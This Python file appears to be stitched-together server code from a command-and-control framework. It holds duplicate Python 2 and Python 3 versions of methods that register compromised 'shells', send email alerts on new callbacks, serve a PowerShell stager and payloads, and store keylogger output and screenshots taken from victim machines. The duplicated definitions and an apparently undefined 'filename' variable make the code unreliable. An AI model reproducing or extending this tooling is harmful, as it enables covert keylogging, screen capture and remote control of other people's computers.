def register(self, guid, data):
cmd, guid, prompt = data.split(" ", 2)
self.db.set_prompt(guid, prompt)
index = self.db.get_id(guid)
print ""
UI.success("Registering new shell %s" % prompt)
UI.success("New shell ID %s GUID is %s" % (index, guid))
Log.log_event("New Shell", data)
def register(self, guid, data):
if type(data) is not str:
data = data.decode()
(cmd, guid, prompt) = data.split(" ", 2)
self.db.set_prompt(guid, prompt)
index = self.db.get_id(guid).decode()
print("")
UI.success("Registering new shell %s" % prompt)
UI.success("New shell ID %s GUID is %s" % (index, guid))
try:
notify = EmailNotify(self.config)
notify.send_notification("NEW SHELL callback: %s" % prompt)
except:
UI.error("Notification failed", False)
self.db.set_key("%s:keylogger" % guid, "")
Log.log_event("New Shell", data)
self.get_autocommands(guid)
if self.config.get("auto-interact") == "on":
pass
def do_GET(self):
if self.path.split("/")[1] == "api":
server_api = ServerApi(self.config, self)
self.output = server_api.process()
self.return_json()
return
path = self.path.split("/")[-1]
if path == self.config.get("http-download-path"):
Log.log_event(
"Download Stager",
"PowerShell stager was fetched from %s (%s)" %
(self.client_address[0], self.address_string()))
self.output = Utils.load_powershell_script("stager.ps1", 29)
elif path in Utils.get_download_folder_content():
self.output = Utils.load_file("download/%s" % path)
Log.log_event(
"Download File", "%s was downloaded from %s (%s)" %
(path, self.client_address[0], self.address_string()))
else:
self.output = Utils.load_file(
"html/%s" % self.config.get("http-default-404"))
Log.log_error("Invalid request got a GET request", self.path)
self.return_data()
def do_GET(self):
force_download = False
if self.path.split("/")[1] == "api":
server_api = ServerApi(self.config, self)
self.output = server_api.process()
self.return_json()
return
path = self.path.split("/")[-1]
payload_path = self.path.split("/")
if payload_path[1] == self.config.get("http-download-path"):
filename = Utils.gen_str(12)
force_download = True
Log.log_event(
"Download Stager", "Stager was fetched from %s (%s)" %
(self.client_address[0], self.address_string()))
payload = Payload(self.config)
if len(payload_path) > 3:
payload.set_type(payload_path[2])
if len(payload_path) > 4:
payload.set_delay(payload_path[3])
self.output = payload.get_output()
elif path in Utils.get_download_folder_content():
force_download = True
self.output = Utils.load_file("download/%s" % path)
Log.log_event(
"Download File", "%s was downloaded from %s (%s)" %
(path, self.client_address[0], self.address_string()))
else:
self.output = Utils.load_file(
"html/%s" % self.config.get("http-default-404"))
Log.log_error("Invalid request got a GET request", self.path)
self.return_data(force_download, filename)
def keylogger(self, guid, data):
cmd, data = data.split(" ", 1)
Log.append_keylogger_data(guid, data)
Log.log_event("Keylogger", "Data received (%s)" % (guid))
def logout(self):
self.active_users.remove(str(self.session["username"]))
Log.log_event("User Logout", "%s" % str(self.session["username"]))
self.session.pop("username")
self.session.pop("authenticated")
def keylogger(self, guid, data):
(cmd, data) = data.split(" ", 1)
shell = self.db.get_prompt(guid).decode().split(" ")[1]
Log.append_keylogger_data(guid, data)
Log.log_event("Keylogger", "Data received (%s)" % shell)
self.db.append_keylogger_data(guid, data)
def screenshot(self, guid, data):
(cmd, data) = data.split(" ", 1)
shell = self.db.get_prompt(guid).decode().split(" ")[1]
Log.log_event("Screenshot", "Received (%s)" % shell)
self.db.append_shell_data(guid, "[%s] Screenshot Received\n\n" % (Utils.timestamp()))
Log.log_screenshot(guid, data)
def keylogger(self, guid, data):
(cmd, data) = data.split(' ', 1)
Log.append_keylogger_data(guid, data)
Log.log_event('Keylogger', 'Data received (%s)' % guid)
self.db.append_keylogger_data(guid, data)
def keylogger(self, guid, data):
(cmd, data) = data.split(' ', 1)
shell = self.db.get_prompt(guid).split(' ')[1]
Log.append_keylogger_data(guid, data)
Log.log_event('Keylogger', 'Data received (%s)' % shell)
self.db.append_keylogger_data(guid, data)
